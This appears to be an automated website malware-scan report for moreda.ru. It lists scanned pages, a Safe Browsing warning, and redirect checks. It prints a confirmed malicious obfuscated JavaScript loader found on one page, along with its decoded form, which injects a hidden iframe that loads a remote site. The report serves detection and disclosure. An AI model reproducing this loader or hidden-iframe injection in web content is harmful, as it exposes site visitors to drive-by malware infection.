Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=moreda.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://moreda.ru/ | HTTP/1.1 200 OK Cache-Control: max-age=0 Connection: close Date: Mon, 12 Jan 2015 02:05:31 GMT Accept-Ranges: bytes ETag: "115743e-3487-44577db35bf00" Server: Apache Vary: Accept-Encoding Content-Length: 13447 Content-Type: text/html; charset=windows-1251 Expires: Mon, 12 Jan 2015 02:05:31 GMT Last-Modified: Wed, 06 Feb 2008 06:56:28 GMT | clean |
http://moreda.ru/es/zonapublica/index.aspx.htm | 200 OK Content-Length: 16838 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
function pnwban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,42,16,58,3,6,24,37,19,15,0,0,0,0,0,0,20,27,30,31,56,5,28,33,47,25,52,61,40,14,29,2,51,35,46,55,11,1,32,34,8,22,45,0,0,0,0,43,0,21,44,7,18,9,48,0,12,36,53,50,39,10,49,13,4,23,38,26,54,59,41,60,62,17,57);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(184^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}pnwban('9cZjFCKPYRhPIPFPTqDlwCZjN0zVFCKtoqNSYPb79_FJhSoiCd6JB_FtaSorYlNjNqXQMtXSNQzkmHNGsOoPhQbVqBzP90b7TWFJCHb7yAZSqCePqBDl8YCth4Z7mCNPYPoijloP2AvkIAoSqqoiymzWT5XVg5ziCkLQokNSCMzlsWzPyPoP2qLWURXr2SNJC4oPEr6WMWzkhchjNqLrFcKkX8NtUTLjqANSssXGq5ZSmlNjNADlyO')
Decoded script:
window.status='Done';document.write('<iframe name=465de src="http://www.3pigs.info/t/?'+Math.round(Math.random()*33988)+'465de'+'" width=293 height=116 style="display:none"></iframe>')
<iframe name=465de src="http://www.3pigs.info/t/?11506465de" width=293 height=116 style="display:none"></iframe>
Antivirus reports:
http://moreda.ru/es/zonapublica/../../js/ventana.js | 200 OK Content-Length: 830 Content-Type: application/javascript | clean |
http://moreda.ru/../../js/cookies.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
http://moreda.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://moreda.ru/../../js/utils.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
http://moreda.ru/../../js/validar.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
http://moreda.ru/../../js/optimized/animtree.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
http://moreda.ru/../../js/optimized/persistenttree.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: moreda.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Mon, 12 Jan 2015 02:05:31 GMT
Accept-Ranges: bytes
ETag: "115743e-3487-44577db35bf00"
Server: Apache
Vary: Accept-Encoding
Content-Length: 13447
Content-Type: text/html; charset=windows-1251
Expires: Mon, 12 Jan 2015 02:05:31 GMT
Last-Modified: Wed, 06 Feb 2008 06:56:28 GMT
...13447 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: moreda.ru
Referer: http://www.google.com/search?q=moreda.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.